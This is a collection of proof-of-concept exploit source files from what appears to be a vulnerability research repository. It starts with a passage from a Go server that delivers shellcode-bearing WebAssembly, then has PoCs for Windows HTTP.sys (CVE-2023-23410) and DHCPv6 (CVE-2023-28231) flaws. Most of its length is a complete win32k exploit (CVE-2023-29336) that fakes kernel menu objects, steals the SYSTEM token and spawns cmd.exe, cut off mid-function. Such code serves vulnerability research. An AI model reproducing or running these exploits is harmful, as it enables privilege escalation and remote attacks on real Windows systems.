w.WriteHeader(http.StatusOK) 140 | return 141 | } 142 | if base == "exp.html" { 143 | if globalFloat == -1 { 144 | fmt.Fprint(w, ` 145 | 146 | 147 | 148 | Refresh Page 149 | 150 | 151 | 152 |

Loading...

153 | 154 | 155 | `) 156 | return 157 | } 158 | content, err := ioutil.ReadFile(p) 159 | if err != nil { 160 | http.Error(w, err.Error(), http.StatusInternalServerError) 161 | return 162 | } 163 | newContent := strings.Replace(string(content), "xxx", fmt.Sprint(globalFloat), -1) 164 | fmt.Println("New content: ", newContent) 165 | fmt.Fprint(w, newContent) 166 | globalFloat = -1 167 | return 168 | } 169 | // fmt.Println(extName) 170 | if extName == ".wasm" { 171 | // 去掉扩展名 172 | nameWithoutExt := strings.TrimSuffix(r.URL.Path, filepath.Ext(r.URL.Path)) 173 | // 去掉前面的"/" 174 | baseName := filepath.Base(nameWithoutExt) 175 | fmt.Printf(baseName) 176 | wasmCodeOk, err := processShellcodeAddr(baseName, wasm_code) 177 | if err != nil { 178 | fmt.Println("发生错误:", err) 179 | panic("处理ShellcodeAddr发生错误") 180 | } 181 | fmt.Println(wasmCodeOk) 182 | wasm, err := wasmtime.Wat2Wasm(wasmCodeOk) 183 | if err != nil { 184 | fmt.Printf("error converting wat to wasm: %v\n", err) 185 | os.Exit(1) 186 | } 187 | fmt.Printf("编译结束") 188 | 189 | w.Header().Set("Content-Type", "application/wasm") 190 | _, err = w.Write([]byte(wasm)) 191 | check(err) 192 | w.(http.Flusher).Flush() 193 | fmt.Printf("flushOK") 194 | return 195 | } 196 | http.ServeFile(w, r, p) 197 | } 198 | func main() { 199 | port := flag.String("p", "443", "port to serve on") 200 | directory := flag.String("d", ".", "the directory of static file to host") 201 | flag.Parse() 202 | fmt.Printf("path %s\n", *directory) 203 | http.HandleFunc("/favicon.ico", faviconHandler) 204 | http.HandleFunc("/", fileServerHandler) 205 | log.Printf("Begin Serving %s on HTTP port: %s\n", *directory, *port) 206 | log.Fatal(http.ListenAndServeTLS(":443", "server.pem", "key.pem", nil)) 207 | } 208 | -------------------------------------------------------------------------------- /CVE-2023-23410/CVE-2023-23410_poc.c: -------------------------------------------------------------------------------- 1 | #define SECURITY_WIN32 2 | #include 3 | #include 4 | #include 5 | #pragma warning(disable:4127) // condition expression is constant 6 | 7 | int 8 | __cdecl 9 | wmain( 10 | int argc, 11 | __in_ecount(argc) wchar_t* argv[] 12 | ) 13 | { 14 | 15 | int i; 16 | HANDLE hReqQueue = NULL; 17 | HTTPAPI_VERSION HttpApiVersion = HTTPAPI_VERSION_2; 18 | HTTP_SERVER_SESSION_ID ssID = HTTP_NULL_ID; 19 | 20 | HTTP_BINDING_INFO BindingProperty; 21 | HTTP_TIMEOUT_LIMIT_INFO CGTimeout; 22 | ULONG retCode; 23 | HTTP_URL_GROUP_ID urlGroupId = HTTP_NULL_ID; 24 | 25 | 26 | // 27 | // Initialize HTTP APIs. 28 | // 29 | 30 | retCode = HttpInitialize( 31 | HttpApiVersion, 32 | HTTP_INITIALIZE_SERVER, // Flags 33 | NULL // Reserved 34 | ); 35 | 36 | if (retCode != NO_ERROR) 37 | { 38 | wprintf(L"HttpInitialize failed with %lu \n", retCode); 39 | return retCode; 40 | } 41 | 42 | // 43 | // Create a server session handle 44 | // 45 | 46 | retCode = HttpCreateServerSession(HttpApiVersion, 47 | &ssID, 48 | 0); 49 | 50 | 51 | if (retCode != NO_ERROR) 52 | { 53 | wprintf(L"HttpCreateServerSession failed with %lu \n", retCode); 54 | return; 55 | } 56 | // 57 | // Create UrlGroup handle 58 | // 59 | 60 | retCode = HttpCreateUrlGroup(ssID, 61 | &urlGroupId, 62 | 0); 63 | 64 | 65 | if (retCode != NO_ERROR) 66 | { 67 | wprintf(L"HttpCreateUrlGroup failed with %lu \n", retCode); 68 | return; 69 | } 70 | 71 | ULONGLONG data1[4] = { 0 }; 72 | ULONGLONG data3[0x21] = { 0 }; 73 | ULONGLONG data[0x1000] = { 0 }; 74 | BYTE data_temp1[0x1000] = { 0 }; 75 | DWORD return_len = 0; 76 | 77 | WCHAR* str = HeapAlloc(GetProcessHeap(), 0, 0xfffffe0); 78 | WCHAR str_test[0xfffe] = L"192.168.205.155:8081"; 79 | memcpy(str, str_test, 0x20); 80 | 81 | data1[0] = 0x01; 82 | data1[1] = str; 83 | data1[2] = 0xfffffe0-0xf0f0f0; 84 | 85 | for (int i = 0; i < 0x11; i++) 86 | { 87 | data3[i] = data1; 88 | } 89 | data[5] = 0x20; 90 | data[3] = 0x0c; 91 | data[2] = 0x11; 92 | data[0] = 0x1; 93 | data[1] = data3; 94 | 95 | retCode = HttpSetUrlGroupProperty(urlGroupId, HttpServerChannelBindProperty,&data,0x20); 96 | 97 | retCode = HttpQueryUrlGroupProperty(urlGroupId,HttpServerChannelBindProperty,&data_temp1,0x140, &return_len); 98 | 99 | 100 | } 101 | 102 | -------------------------------------------------------------------------------- /CVE-2023-28231/CVE-2023-28231-DHCP-VUL-PoC.cpp: -------------------------------------------------------------------------------- 1 |  2 | #include 3 | #include 4 | #include 5 | 6 | #pragma comment(lib, "Ws2_32.lib") 7 | 8 | int main() { 9 | char data[] = 10 | "\x0c\x03\xa4\xf2\x00\x08\x00\x02\x00\x00\x00\x01\x00\x0e\x00\x01" 11 | "\x00\x01\x2b\x07\x5b\xc1\x00\x0c\x29\xe8\x6b\x79\x00\x03\x00\x0c" 12 | "\x07\x00" 13 | 14 | 15 | 16 | 17 | "\x00\x09\x00\x86\x0c\x02"//0x3a+0x26*2 18 | 19 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 20 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 21 | 22 | "\x00\x09\x00\x60\x0c\x02"//0x3a+0x26 23 | 24 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 25 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 26 | 27 | "\x00\x09\x00\x3a\x0c\x01" 28 | 29 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 30 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 31 | 32 | "\x00\x09\x00\x14\x01\x07\x00\x00" 33 | "\x00\x02\x00\x04\x01\x07\x00\x00" 34 | "\x00\x01\x00\x04\x01\x07\x00\x00" 35 | 36 | ; 37 | 38 | char par1[] = 39 | "\x00\x09\x0a\x9b\x0c\x01" 40 | "\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00" 41 | "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 42 | char par2[] = 43 | "\x00\x09\x00\x14\x01\x07\x00\x00" 44 | "\x00\x02\x00\x04\x01\x07\x00\x00" 45 | "\x00\x01\x00\x04\x01\x07\x00\x00" 46 | ; 47 | 48 | 49 | 50 | char data1[0x1000] = 51 | "\x0c\x20\xa4\xf2\x00\x08\x00\x02\x00\x00\x00\x01\x00\x0e\x00\x01" 52 | "\x00\x01\x2b\x07\x5b\xc1\x00\x0c\x29\xe8\x6b\x79\x00\x03\x00\x0c" 53 | "\x07\x00" 54 | 55 | ; 56 | 57 | int num = 0x1f; 58 | int total_len = 0x14 + 0x26 * (num+1); 59 | for (int i = 0; i <= num; i++) 60 | { 61 | memset(par1 + 5, num - i, 1); 62 | short temp = htons(total_len - i * 0x26); 63 | 64 | memcpy(par1 + 2, &temp, 2); 65 | memcpy(data1 + 0x22 + 0x26 * i, par1, 0x26); 66 | if (i == num) 67 | { 68 | memcpy(data1 + 0x22 + 0x26 * i + 0x26, par2, 0x18); 69 | } 70 | 71 | } 72 | int sendlenth = 0x26 * (num+1) + 0x22 + 0x18; 73 | // 初始化 Winsock 74 | WSADATA wsaData; 75 | int result = WSAStartup(MAKEWORD(2, 2), &wsaData); 76 | if (result != 0) { 77 | std::cerr << "WSAStartup failed with error: " << result << std::endl; 78 | return 1; 79 | } 80 | 81 | // 创建套接字 82 | SOCKET sock = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); 83 | if (sock == INVALID_SOCKET) { 84 | std::cerr << "Failed to create socket: " << WSAGetLastError() << std::endl; 85 | WSACleanup(); 86 | return 1; 87 | } 88 | 89 | // 设置套接字选项,允许发送广播 90 | int optVal = 1; 91 | if (setsockopt(sock, IPPROTO_IPV6, IPV6_MULTICAST_LOOP, (char*)&optVal, sizeof(optVal)) == SOCKET_ERROR) { 92 | std::cerr << "Failed to set socket option: " << WSAGetLastError() << std::endl; 93 | closesocket(sock); 94 | WSACleanup(); 95 | return 1; 96 | } 97 | 98 | // 构建 DHCPv6 广播地址 99 | sockaddr_in6 destAddr = { 0 }; 100 | destAddr.sin6_family = AF_INET6; 101 | destAddr.sin6_port = htons(547); // DHCPv6 默认端口号为 547 102 | InetPton(AF_INET6, L"ff02::1:2", &destAddr.sin6_addr); // DHCPv6 广播地址为 ff02::1:2 103 | 104 | // 发送 DHCPv6 广播消息 105 | int sendResult = 0; 106 | for (int i = 0; i < 0x10; i++) 107 | { 108 | sendResult = sendto(sock, data1, sendlenth, 0, (sockaddr*)&destAddr, sizeof(destAddr)); 109 | } 110 | 111 | int m = GetLastError(); 112 | if (sendResult == SOCKET_ERROR) { 113 | std::cerr << "Failed to send data: " << WSAGetLastError() << std::endl; 114 | closesocket(sock); 115 | WSACleanup(); 116 | return 1; 117 | } 118 | 119 | std::cout << "DHCPv6 Broadcast message sent!" << std::endl; 120 | 121 | // 清理资源 122 | closesocket(sock); 123 | WSACleanup(); 124 | 125 | return 0; 126 | } 127 | -------------------------------------------------------------------------------- /CVE-2023-29336/poc.cpp: -------------------------------------------------------------------------------- 1 | 2 | // writeup link: https://www.numencyber.com/cve-2023-29336-win32k-analysis/ 3 | 4 | #include 5 | //windows server 2016 Datacenter update patch in May 6 | #include 7 | #include 8 | 9 | #define IDM_MYMENU 101 10 | #define IDM_EXIT 102 11 | #define IDM_DISABLE 0xf120 12 | #define IDM_ENABLE 104 13 | #define EPROCESS_UNIQUE_PROCESS_ID_OFFSET 0x440 14 | #define EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448 15 | #define EPROCESS_TOKEN_OFFSET 0x4b8 16 | 17 | typedef DWORD64(NTAPI* NtUserEnableMenuItem)(HMENU hMenu, UINT uIDEnableItem, UINT uEnable); 18 | 19 | typedef DWORD64(NTAPI* NtUserSetClassLongPtr)(HWND a1, unsigned int a2, unsigned __int64 a3, unsigned int a4); 20 | typedef DWORD64(NTAPI* NtUserCreateAcceleratorTable)(void* Src, int a2); 21 | typedef DWORD64(NTAPI* fnNtUserConsoleControl)(int nConsoleCommand, PVOID, int nConsoleInformationLength); 22 | 23 | 24 | NtUserSetClassLongPtr g_NtUserSetClassLongPtr = NULL; 25 | NtUserEnableMenuItem g_NtUserEnableMenuItem = NULL; 26 | NtUserCreateAcceleratorTable g_NtUserCreateAcceleratorTable = NULL; 27 | fnNtUserConsoleControl g_pfnNtUserConsoleControl = nullptr; 28 | LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam); 29 | int syytem(); 30 | typedef struct _SHELLCODE { 31 | DWORD reserved; 32 | DWORD pid; 33 | DWORD off_THREADINFO_ppi; 34 | DWORD off_EPROCESS_ActiveLink; 35 | DWORD off_EPROCESS_Token; 36 | BOOL bExploited; 37 | BYTE pfnWindProc[]; 38 | } SHELLCODE, * PSHELLCODE; 39 | struct tagMENU 40 | { 41 | ULONG64 field_0; 42 | ULONG64 field_8; 43 | ULONG64 field_10; 44 | ULONG64 field_18; 45 | ULONG64 field_20; 46 | PVOID obj28; 47 | DWORD field_30; 48 | DWORD flag1; 49 | DWORD flag2; 50 | DWORD cxMenu; 51 | DWORD cyMenu; 52 | ULONG64 field_48; 53 | PVOID rgItems; 54 | ULONG64 field_58; // + 0x58 55 | ULONG64 field_60; 56 | ULONG64 field_68; 57 | ULONG64 field_70; 58 | ULONG64 field_78; 59 | ULONG64 field_80; 60 | ULONG64 field_88; 61 | ULONG64 field_90; 62 | PVOID ref; // + 0x98 63 | }; 64 | struct MyData 65 | { 66 | BYTE name[0x96]; 67 | }; 68 | tagMENU* g_pFakeMenu = 0; 69 | static PSHELLCODE pvShellCode = NULL; 70 | HMENU hSystemMenu; 71 | HMENU hMenu; 72 | HMENU hSubMenu; 73 | HMENU hAddedSubMenu; 74 | HMENU hMenuB; 75 | PVOID MENU_add = 0; 76 | DWORD flag = 0; 77 | UINT iWindowCount = 0x100; 78 | HWND HWND_list[0x300]; 79 | HWND HWND_list1[0x20]; 80 | HMENU HMENUL_list[0x300]; 81 | int Hwnd_num = 0; 82 | int Hwnd_num1 = 0; 83 | ULONGLONG HWND_add = 0; 84 | ULONGLONG GS_off = 0; 85 | WORD max = 0; 86 | 87 | static PULONGLONG ptagWNDFake = NULL; 88 | static PULONGLONG ptagWNDFake1 = NULL; 89 | static PULONGLONG ptagWNDFake2 = NULL; 90 | 91 | static PULONGLONG GS_hanlde = NULL; 92 | 93 | static PULONGLONG HWND_class = NULL; 94 | 95 | 96 | struct ThreadParams { 97 | int threadId; 98 | int numLoops; 99 | }; 100 | 101 | 102 | static unsigned long long GetGsValue(unsigned long long gsValue) 103 | { 104 | return gsValue; 105 | } 106 | PVOID 107 | GetMenuHandle(HMENU menu_D) 108 | { 109 | int conut = 0; 110 | PVOID HANDLE = 0; 111 | PBYTE add = 0; 112 | WORD temp = 0; 113 | DWORD offset = 0xbd688; 114 | HMODULE hModule = LoadLibraryA("USER32.DLL"); 115 | 116 | PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu"); 117 | ULONGLONG par1 = 0; 118 | DWORD par2 = 0; 119 | memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08); 120 | memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02); 121 | 122 | add = (PBYTE)(par1 + 0x18 * (WORD)menu_D); 123 | 124 | if (add) 125 | { 126 | HANDLE = *(PVOID*)add; 127 | } 128 | else 129 | { 130 | HANDLE = 0; 131 | } 132 | HANDLE= (PVOID*)((ULONGLONG)HANDLE - GS_off+0x20); 133 | return *(PVOID*)HANDLE; 134 | 135 | } 136 | 137 | PVOID 138 | xxGetHMValidateHandle(HMENU menu_D, DWORD type_hanlde) 139 | { 140 | int conut = 0; 141 | PVOID HANDLE = 0; 142 | PBYTE add = 0; 143 | WORD temp = 0; 144 | DWORD offset = 0xbd688; 145 | HMODULE hModule = LoadLibraryA("USER32.DLL"); 146 | 147 | PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu"); 148 | ULONGLONG par1 = 0; 149 | DWORD par2 = 0; 150 | memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08); 151 | memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02); 152 | 153 | temp = (ULONGLONG)menu_D >> 16; 154 | add = (PBYTE)(par1 + 0x18 * (WORD)menu_D); 155 | if (add) 156 | { 157 | HANDLE = *(PVOID*)add; 158 | } 159 | else 160 | { 161 | HANDLE = 0; 162 | } 163 | HANDLE = (PVOID*)((ULONGLONG)HANDLE - GS_off + 0x20); 164 | return *(PVOID*)HANDLE; 165 | 166 | } 167 | 168 | 169 | static 170 | VOID 171 | xxReallocPopupMenu(VOID) 172 | { 173 | for (INT i = 0; i < 0x8; i++) 174 | { 175 | WNDCLASSEXW Class = { 0 }; 176 | WCHAR szTemp[0x100] = { 0 }; 177 | HWND hwnd = NULL; 178 | wsprintfW(szTemp, L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@A%d", i); 179 | Class.cbSize = sizeof(WNDCLASSEXA); 180 | Class.lpfnWndProc = DefWindowProcW; 181 | Class.cbWndExtra = 0; 182 | Class.hInstance = GetModuleHandleA(NULL); 183 | Class.lpszMenuName = NULL; 184 | Class.lpszClassName = szTemp; 185 | if (!RegisterClassExW(&Class)) 186 | { 187 | continue; 188 | } 189 | } 190 | 191 | } 192 | VOID 193 | createclass(VOID) 194 | { 195 | WCHAR szTemp[0x100] = { 0 }; 196 | for (INT i = 9; i < 29; i++) 197 | { 198 | WNDCLASSEXW Class = { 0 }; 199 | 200 | HWND hwnd = NULL; 201 | wsprintfW(szTemp, L"A@A%d", i); 202 | Class.cbSize = sizeof(WNDCLASSEXA); 203 | Class.lpfnWndProc = DefWindowProcW; 204 | Class.cbWndExtra = 0x20; 205 | Class.hInstance = GetModuleHandleA(NULL); 206 | Class.lpszMenuName = NULL; 207 | Class.lpszClassName = szTemp; 208 | Class.cbClsExtra = 0x1a0; 209 | if (!RegisterClassExW(&Class)) 210 | { 211 | continue; 212 | } 213 | } 214 | 215 | for (INT i = 9; i < 29; i++) 216 | { 217 | wsprintfW(szTemp, L"A@A%d", i); 218 | HWND_list1[i]=CreateWindowEx(NULL, szTemp, NULL, WS_VISIBLE, 0, 0, 0, 0, NULL,NULL, NULL, NULL); 219 | 220 | 221 | } 222 | 223 | } 224 | 225 | ULONG64 Read64(ULONG64 address) 226 | { 227 | MENUBARINFO mbi = { 0 }; 228 | mbi.cbSize = sizeof(MENUBARINFO); 229 | 230 | g_pFakeMenu->rgItems = PVOID(address - 0x48); 231 | GetMenuBarInfo(HWND_list[max+1], OBJID_MENU, 1, &mbi); 232 | 233 | return (unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32); 234 | } 235 | void exploit() 236 | { 237 | for (int i = 0; i < 0x20; i++) 238 | { 239 | 240 | ULONG64 pmenu = SetClassLongPtr(HWND_list1[i], 0x270, (LONG_PTR)g_pFakeMenu); 241 | if (pmenu != 0) 242 | { 243 | Hwnd_num = i; 244 | MENUBARINFO mbi = { 0 }; 245 | mbi.cbSize = sizeof(MENUBARINFO); 246 | 247 | 248 | 249 | } 250 | } 251 | 252 | 253 | // Token stealing 254 | ULONG64 p = Read64(HWND_add +0x250+ 0x10); // USER_THREADINFO 255 | p = Read64(p); //THREADINFO 256 | p = Read64(p + 0x220); // (PROCESSINFO) 257 | 258 | ULONG64 eprocess = p; 259 | printf("Current EPROCESS = %llx\n", eprocess); 260 | p = Read64(p + 0x2f0); 261 | 262 | do { 263 | 264 | p = Read64(p + 0x08); 265 | ULONG64 pid = Read64(p - 0x08); 266 | if (pid == 4) { 267 | 268 | ULONG64 pSystemToken = Read64(p + 0x68); 269 | printf("pSys/tem Token = %llx \n", pSystemToken); 270 | 271 | HWND_class = (PULONGLONG)((PBYTE)0x303000); 272 | HWND_class[8] = eprocess + 0x290; 273 | HWND_class[12] = 0x100; 274 | HWND_class[20] = 0x303010; 275 | 276 | ULONG64 ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - 0xa0, (LONG_PTR)HWND_class); 277 | SetClassLongPtr(HWND_list[max + 1], 0x28, pSystemToken); 278 | ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - 0xa0, (LONG_PTR)ret_add); 279 | 280 | break; 281 | } 282 | } while (p != eprocess); 283 | syytem(); 284 | } 285 | 286 | 287 | void buildmem() 288 | { 289 | 290 | WORD max_handle = 0; 291 | pvShellCode = (PSHELLCODE)VirtualAlloc((PVOID)0x300000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 292 | if (pvShellCode == NULL) 293 | { 294 | return; 295 | } 296 | ZeroMemory(pvShellCode, 0x10000); 297 | 298 | 299 | 300 | ptagWNDFake = (PULONGLONG)((PBYTE)0x304140); 301 | ptagWNDFake[0] = (ULONGLONG)0x304140; 302 | 303 | ptagWNDFake[2] = (ULONGLONG)0x304140 + 0x10; 304 | 305 | 306 | 307 | ptagWNDFake[6] = (ULONGLONG)0x304140; 308 | ptagWNDFake[8] = 0x305300; 309 | 310 | ptagWNDFake[11] = (ULONGLONG)MENU_add; 311 | ptagWNDFake[68] = (ULONGLONG)0x304140 + 0x230; 312 | ptagWNDFake[69] = (ULONGLONG)0x304140 + 0x28; 313 | ptagWNDFake[70] = (ULONGLONG)0x304140 + 0x30; 314 | ptagWNDFake[71] = (ULONGLONG)0x000004; 315 | 316 | 317 | ptagWNDFake1 = (PULONGLONG)((PBYTE)0x305300); 318 | ptagWNDFake1[1] = (ULONGLONG)0x11; 319 | ptagWNDFake1[2] = (ULONGLONG)0x305320; 320 | ptagWNDFake1[6] = (ULONGLONG)0x1000000000020000; 321 | ptagWNDFake1[8] = (ULONGLONG)0x00000000029d0000; 322 | ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120; 323 | 324 | 325 | ptagWNDFake1[14] = (ULONGLONG)0x306500; 326 | ptagWNDFake1[16] = (ULONGLONG)305400; 327 | 328 | 329 | ptagWNDFake2 = (PULONGLONG)((PBYTE)0x306500); 330 | ptagWNDFake1[11] = (ULONGLONG)0x306600; 331 | 332 | 333 | 334 | WNDCLASSEX WndClass = { 0 }; 335 | WndClass.cbSize = sizeof(WNDCLASSEX); 336 | WndClass.lpfnWndProc = DefWindowProc; 337 | WndClass.style = CS_VREDRAW | CS_HREDRAW; 338 | WndClass.cbWndExtra = 0xe0; 339 | WndClass.hInstance = NULL; 340 | WndClass.lpszMenuName = NULL; 341 | WndClass.lpszClassName = L"NormalClass"; 342 | 343 | RegisterClassEx(&WndClass); 344 | 345 | for (int i = 0; i < 0x200; i++) 346 | { 347 | HMENUL_list[i] = CreateMenu(); 348 | } 349 | for (int i = 0; i < 0x100; i++) 350 | { 351 | HWND_list[i] = CreateWindowEx(NULL, L"NormalClass", NULL, WS_VISIBLE, 0, 0, 0, 0, NULL, HMENUL_list[i], NULL, NULL); 352 | 353 | } 354 | for (int i = 0; i < 0x100; i++) 355 | { 356 | 357 | 358 | SetWindowLongPtr(HWND_list[i], 0x58, (LONG_PTR)0x0002080000000000); 359 | 360 | SetWindowLongPtr(HWND_list[i], 0x80, (LONG_PTR)0x0000303030000000); 361 | 362 | } 363 | 364 | 365 | for (int i = 0x20; i < 0x60; i++) 366 | { 367 | if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01)- (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 - 1], 0x01)== 0x250) 368 | { 369 | if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 + 1], 0x01)-(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01) == 0x250) 370 | { 371 | HWND_add = (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i*2], 0x01); 372 | max = i * 2; 373 | break; 374 | } 375 | } 376 | if (i == 0x5f) 377 | { 378 | HWND_add = 0; 379 | } 380 | 381 | } 382 | 383 | ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120; 384 | 385 | 386 | DestroyWindow(HWND_list[max]); 387 | 388 | createclass(); 389 | 390 | 391 | 392 | // Create a fake spmenu 393 | PVOID hHeap = (PVOID)0x302000; 394 | 395 | g_pFakeMenu = (tagMENU*)(PVOID)0x302000; 396 | g_pFakeMenu->ref = (PVOID)0x302300; 397 | *(PULONG64)g_pFakeMenu->ref = (ULONG64)g_pFakeMenu; 398 | // cItems = 1 399 | g_pFakeMenu->obj28 = (PVOID)0x302200; 400 | *(PULONG64)((PBYTE)g_pFakeMenu->obj28 + 0x2C) = 1; 401 | // rgItems 402 | g_pFakeMenu->rgItems = (PVOID)0x304000; 403 | // cx / cy must > 0 404 | g_pFakeMenu->flag1 = 1; 405 | g_pFakeMenu->flag2 = 1; 406 | g_pFakeMenu->cxMenu = 1; 407 | g_pFakeMenu->cyMenu = 1; 408 | 409 | 410 | // 411 | 412 | } 413 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) 414 | { 415 | ULONGLONG gsValue = 0; 416 | unsigned char shellcode[] = "\x65\x48\x8B\x04\x25\x30\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc3"; 417 | 418 | LPVOID executableMemory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 419 | if (executableMemory == NULL) { 420 | return 1; 421 | } 422 | memcpy(executableMemory, shellcode, sizeof(shellcode)); 423 | 424 | gsValue = ((ULONGLONG(*)())executableMemory)(); 425 | gsValue = gsValue + 0x800; 426 | GS_hanlde = (PULONGLONG)(PBYTE)gsValue; 427 | GS_off = GS_hanlde[5]; 428 | 429 | char str[0xb8] = ""; 430 | memset(str, 0x41, 0xa8); 431 | g_NtUserEnableMenuItem = (NtUserEnableMenuItem)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserEnableMenuItem"); 432 | g_NtUserSetClassLongPtr = (NtUserSetClassLongPtr)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserSetClassLongPtr"); 433 | g_NtUserCreateAcceleratorTable = (NtUserCreateAcceleratorTable)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserCreateAcceleratorTable"); 434 | g_pfnNtUserConsoleControl = (fnNtUserConsoleControl)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserConsoleControl"); 435 | 436 | WNDCLASS wc = { 0 }; 437 | 438 | wc.lpfnWndProc = WndProc; 439 | wc.hInstance = hInstance; 440 | wc.lpszClassName = TEXT("EnableMenuItem"); 441 | 442 | RegisterClass(&wc); 443 | 444 | HWND hWnd = CreateWindow( 445 | wc.lpszClassName, 446 | TEXT("EnableMenuItem"), 447 | WS_OVERLAPPEDWINDOW, 448 | CW_USEDEFAULT, 449 | CW_USEDEFAULT, 450 | 400, 300, 451 | NULL, 452 | NULL, 453 | hInstance, 454 | NULL 455 | ); 456 | 457 | if (!hWnd) return FALSE; 458 | 459 | /// 460 | 461 | 462 | hSystemMenu = GetSystemMenu(hWnd, FALSE); 463 | 464 | hSubMenu = CreatePopupMenu(); 465 | MENU_add = GetMenuHandle(hSubMenu); 466 | hMenuB = CreateMenu(); 467 | 468 | buildmem(); 469 | if (HWND_add == 0) 470 | { 471 | return 0; 472 | } 473 | 474 | 475 | AppendMenu(hSubMenu, MF_STRING, 0x2061, TEXT("0")); 476 | AppendMenu(hSubMenu, MF_STRING, 0xf060, TEXT("1")); 477 | 478 | DeleteMenu(hSystemMenu, SC_CLOSE, MF_BYCOMMAND); 479 | 480 | AppendMenu(hMenuB, MF_POPUP, (UINT_PTR)hSubMenu, L"Menu A"); 481 | 482 | AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)hMenuB, L"Menu B"); 483 | 484 | 485 | 486 | ShowWindow(hWnd, nCmdShow); 487 | UpdateWindow(hWnd); 488 | 489 | flag = 1; 490 | g_NtUserEnableMenuItem(hSystemMenu, 0xf060, 0x01); 491 | 492 | exploit(); 493 | 494 | MSG msg = { 0 }; 495 | 496 | while (GetMessage(&msg, NULL, 0, 0)) 497 | { 498 | TranslateMessage(&msg); 499 | DispatchMessage(&msg); 500 | } 501 | 502 | return (int)msg.wParam; 503 | } 504 | 505 | LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) 506 | { 507 | switch (message) 508 | { 509 | case WM_DESTROY: 510 | PostQuitMessage(0); 511 | return 0; 512 | case 0xae: 513 | switch (wParam) 514 | { 515 | case 0x1000: 516 | if (flag) 517 | { 518 | int itemCount = GetMenuItemCount(hMenuB); 519 | 520 | for (int i = itemCount - 1; i >= 0; i--) { 521 | RemoveMenu(hMenuB, i, MF_BYPOSITION); 522 | } 523 | DestroyMenu(hSubMenu); 524 | xxReallocPopupMenu(); 525 | } 526 | case 0x1001: 527 | if (flag) 528 | { 529 | int itemCount = GetMenuItemCount(hMenuB); 530 | 531 | for (int i = itemCount - 1; i >= 0; i--) { 532 | RemoveMenu(hMenuB, i, MF_BYPOSITION); 533 | } 534 | DestroyMenu(hSubMenu); 535 | xxReallocPopupMenu(); 536 | } 537 | 538 | return 0; 539 | } 540 | break; 541 | 542 | 543 | } 544 | 545 | return DefWindowProc(hWnd, message, wParam, lParam); 546 | } 547 | int syytem() 548 | { 549 | SECURITY_ATTRIBUTES sa; 550 | HANDLE hRead, hWrite; 551 | byte buf[40960] = { 0 }; 552 | STARTUPINFOW si; 553 | PROCESS_INFORMATION pi; 554 | DWORD bytesRead; 555 | RtlSecureZeroMemory(&si, sizeof(si)); 556 | RtlSecureZeroMemory(&pi, sizeof(pi)); 557 | RtlSecureZeroMemory(&sa, sizeof(sa)); 558 | int br = 0; 559 | sa.nLength = sizeof(SECURITY_ATTRIBUTES); 560 | sa.lpSecurityDescriptor = NULL; 561 | sa.bInheritHandle = TRUE; 562 | if (!CreatePipe(&hRead, &hWrite, &sa, 0)) 563 | { 564 | return -3; 565 | } 566 | 567 | si.cb = sizeof(STARTUPINFO); 568 | GetStartupInfoW(&si); 569 | si.hStdError = hWrite; 570 | si.hStdOutput = hWrite; 571 | si.wShowWindow = SW_HIDE; 572 | si.lpDesktop = L"WinSta0\\Default"; 573 | si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 574 | wchar_t cmd[4096] = { L"cmd.exe" }; 575 | 576 | if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) 577 | { 578 | CloseHandle(hWrite); 579 | CloseHandle(hRead); 580 | printf("[!] CreateProcessW Failed![%lx]\n", GetLastError()); 581 | return -2; 582 | } 583 